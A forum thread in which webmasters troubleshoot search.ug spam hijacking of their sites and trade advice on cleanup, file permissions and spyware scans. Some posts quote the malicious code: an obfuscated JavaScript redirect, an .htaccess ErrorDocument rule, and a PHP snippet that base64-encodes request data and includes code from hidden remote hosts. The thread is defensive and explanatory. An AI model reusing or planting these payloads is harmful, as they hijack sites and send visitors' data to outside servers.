Technology, Support, and News Forum

[Frenchtowner Profile Website]

This hijacking problem continues. My site has been affected in the same manner as noted above with scores of fictitious pages on my site like the one listed below on Google:

nyc travel blog part 2 madonna versace
nyc travel blog part 2 madonna versace, parent directory fifa 2000 -xxx -html... nortons antivirus 2005 full download english warez, torrent for fate game, ...
www.frenchtowner.com/blog-frenchtown-nj/ 2005/05/nyc-travel-blog-part-2-madonna-versace.html - 10k - Cached - Similar pages

I have corrected all the form pages associated with this problem, but there are still pages from my blog that are redirecting to search.ug and other sites like search.kg, find.pl, find.gl, search.tj, and one sex site called icoonet.com. I have looked at my directories to find suspicious files and looked at my htacess files for the same. My problem is that I dont know what should and should not be there. I did not find a configs.php file.

You should know that my blog is associated with blogspot, blogger.com and hosted on my server. I have backed up my entire blog and taken it down and reloaded and republished it, and it did not help.

In the redirecting pages there is a common mistake in all of them, there is a blank space in the address of the url which causes the 404 redirect. Some script however is sending these fake blog pages to these other sites and not to my default custom 404 page.

I would appreciate some advise on this matter.

[doodlebee Profile]

Did you change the permissions on your files before reloading them? Most of them will be reset to odd numbers (if I recall, I had some set to 777, but most were weird, like 604 and stuff), when then should be things like 644 and 755. If you don't change the permissions, then you're just leaving yourself open to another attack.

Also, look through your blog entries - not each individual one, but the actual pages. do you see, anywhere towards the bottom, a small <iframe> tag with a bunch of jumbled characters? That's anoter way they do it - put in a small 1x1 iframe and place the redirect in there. If you saved all your entries and reuploaded them without removing this (if it's there), then you're just putting it back up.

[doodlebee Profile]

By the way, I just went to your site and it's fine. No weird code at the bottom. I also plugged in a non-valid address - took me to your $)$ page.

Have you scanned your own computer for viruses and/or spyware and stuff? Could be that your browser really is hijacked - you need to download Lavasoft's Ad-Aware and Spyobot Search & Destry. (Run both -as one catches what the other misses). I'd also download Hijack This! and give it a go, as well.

Your site isn't what appears to be hijacked, as it's oming up roses for me.

Oh yeah, and stop using Internet Explorer. Use safe browsers, like Mozilla Firefox, or Opera. That little switch stopped about 95% of all the "bad stuff" that was happening to me from using IE all the time.

[Frenchtowner Profile Website]

Doodlebee,

Thanks for looking over my site, and for ofering suggestions. I will check the permissions on my files and directories to try to close some doors here.

I came up with my own solution today that was not elegant, but it was the best one that I could think of. I replaced all of the fictitious pages that Google had listed as part of my site for everything from warez sites, code cracking to teen sex with custom error pages.

I do believe that I was hacked and hijacked because I found this code on the cached version of the page that was redirecting users to search.ug and it's sister sites:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>cake cartoon toppers wedding</title>
<META http-equiv="Content-Type" content="text/html; charset=UTF-8">
<META http-equiv="Content-Language" content="en-us">
<META http-equiv="Expires" content="-1">
<META http-equiv="revisit-after" Content="3 days">
<META http-equiv="robots" content="index,follow">
<META name="robots" content="ALL">
<META name="rating" content="General">
<META name="revisit" content="3 days">
<META name="Content-Language" Content="en-us">
<META name="Language" Content="english">
<META name="Subject" Content="cake cartoon toppers wedding, Drive Image 5 serial number, wvvw.escort-central.com/forum/ images/avatars/axel f-crazy forg.jsp">
<META name="description" Content="cake cartoon toppers wedding, beyonce-sexy, idea pl profit, simple dns 3.50.01 crack, muonline get fast exp">
<META name="keywords" Content="cake cartoon toppers wedding, my humps.mid download, sat hackz, kazaa pro registration key, sony mp3 plug-in 2 keygen gratis, Katya Lel, Doletaj mp3, ragnarok online item / zeny generator">
<script language="JavaScript">
<!--
function ames() {
if(self.parent.frames.length != 0)
self.parent.location = document.location;
}
function gotopage(adress) {
if(adress != '') { window.location.href = adress; }
}
ames();
eval('windo'+'w.loc'+'at'+'ion='+'"ht'+'tp:'+'//'+'sea'+'rch'+'.ug'+'/?'+'cT1e'+'Xl5'+'zP'+'WVeX'+'l5kPQ=="');
// -->
</script>

I find it funny that this javascript would be on the page when the webmaster for search.ug assured me that he had nothing to do with this and that it must be his competitors that was doing this to destroy his business. Is it possible that he did not do the redirects and that someone else used his address and inserted this code on these pages?


EDITED by neuro for hyperlink

[stranmills Profile]

I was looking at the log files for a site I run. From early December 05 traffic started coming in looking for a subdirectory where I had a trial version of an on-line shopping-cart application. I suspect the PHP files had been hacked to redirect people looking for e.g. crazy frog download, slovoed, partition magic crack, etc to search.ug. search.ug then displays adverts for dating agencies etc.

I removed the offending PHP files but Google, bless it, has the links cached so I still get some traffic. I don't think ASP is much safer. I noticed some asp sites have been hijacked by search.ugh!

By the way, they have the cheek to borrow the MS search favicon!

[asachdeva Profile]

The problem is definetly in your computer. As common sense suggests if google is hacked the news is big..... i mean very big.

this problem occurs after running the macromedia(now owned by eidolic adobe) flash player content from a bad website read http://www.macromedia.com/devnet/securi ... 06-03.html
as well as
http://www.microsoft.com/technet/securi ... 16208.mspx

What you need to do ?
Go to Tools->Internet Options->Security->Internet, press Default level then raise the bar to HIGH.
After you do this you wont be able to access certain sites, to do that add those sites in ur trusted sites list (Remove the check box requires server verification) Also change the security level of Trust Site to Meduim from low.

This should fix the problem and will make ur browsing safer.

Njoi

[TheDoctor Profile]

The search.ug spam works like this:

The hacker finds a folder CHMOD'ed 777 on your webserver (777 means world read, write, execute).

He then uploades an .htaccess file to that folder

The contents of the .htaccess file will contain something like this:

Options -MultiViews
ErrorDocument 404 //public_html/home/data/time.php
Options -MultiViews
ErrorDocument 404 //home/data/report.php


He then uploads the files (named in the .htacess file - in example above - time.php, report.php) to the same folder CHMOD'ed 777.

The content of time.php, report.php, etc. will contain the following PHP Code:

error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s"; if ((include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);}

The next time GOOGLE or any other major search engine spiders the account numerous SPAM pages will be inserted into the ROBOT'S cache AS IF THEY EXISTED on your webserver.

On GOOGLE they will appear under the subcategory as: Supplemental Result

Solution: delete the .htaccess file plus any file(s) that it's redirecting to and CHMOD the folder to 755.

[kd1966 Profile YIM]

Welcome to PROnetworks TheDoctor!! Great to have you here; please stop by our Introduction Area so we can welcome you properly.

Thanks for the info on this, we appreciate it; enjoy the site!

[Frenchtowner Profile Website]

After a long period of thinking that I had resolved this problem on my website, I found out today that all of my work is not done.

My website only has 334 pages, but in a Google.com site search, my site shows 216,000 pages. These all show up as Supplental Result pages and do not redirect to search.ug or any of it's sister sites, unless you look at the Google cached results.

I have checked all of my page permissions, checked for illegetimate files and the problem has only gotten worse since the last Google update.

I would love to have some advice, If anyone knows where to start.

PS, there are a huge number of other sites with this same problem, some of them non-profit organization websites.

Thanks,
John